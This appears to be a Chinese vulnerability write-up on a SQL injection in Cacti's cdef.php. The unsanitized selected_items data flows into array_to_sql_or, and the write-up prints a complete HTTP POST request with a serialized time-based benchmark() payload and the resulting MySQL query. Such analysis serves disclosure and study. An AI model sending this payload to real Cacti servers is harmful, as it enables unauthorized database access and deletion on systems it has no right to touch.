问题出现在文件cdef.php里面的form_actions函数里面
function form_actions() { global $colors, $cdef_actions; /* if we are to save this form, instead of display it */ if (isset($_POST["selected_items"])) { $selected_items = unserialize(stripslashes($_POST["selected_items"])); if ($_POST["drp_action"] == "1") { /* delete */ db_execute("delete from cdef where " . array_to_sql_or($selected_items, "id")); db_execute("delete from cdef_items where " . array_to_sql_or($selected_items, "cdef_id")); }elseif ($_POST["drp_action"] == "2") { /* duplicate */ for ($i=0;($i<count($selected_items));$i++) { /* ================= input validation ================= */ input_validate_input_number($selected_items[$i]); /* ==================================================== */ duplicate_cdef($selected_items[$i], $_POST["title_format"]); } } header("Location: cdef.php"); exit; }
跟进array_to_sql_or(),在/lib/database.php中发现了
function array_to_sql_or($array, $sql_column) { /* if the last item is null; pop it off */ if ((empty($array{count($array)-1})) && (sizeof($array) > 1)) { array_pop($array); } if (count($array) > 0) { $sql_or = "($sql_column IN("; for ($i=0;($i<count($array));$i++) { if (is_array($array[$i]) && array_key_exists($sql_column, $array[$i])) { $sql_or .= (($i == 0) ? "'":",'") . $array[$i][$sql_column] . "'"; } else { $sql_or .= (($i == 0) ? "'":",'") . $array[$i] . "'"; } } $sql_or .= "))"; return $sql_or; } }
POST /cdef.php?action=actions HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: Cacti=fvb36noraocv8etfbrvokrle81 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 112 selected_items=a:1:{i:0;s:31:"',benchmark(10000000,sha1(1)),'";}&drp_action=1
实际Mysql执行的是
delete from cdef_items where (cdef_id IN('',benchmark(10000000,sha1(1)),''))
特别标注:
本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
- 我的微信
- 微信扫一扫
-
- 我的微信公众号
- 微信扫一扫
-
评论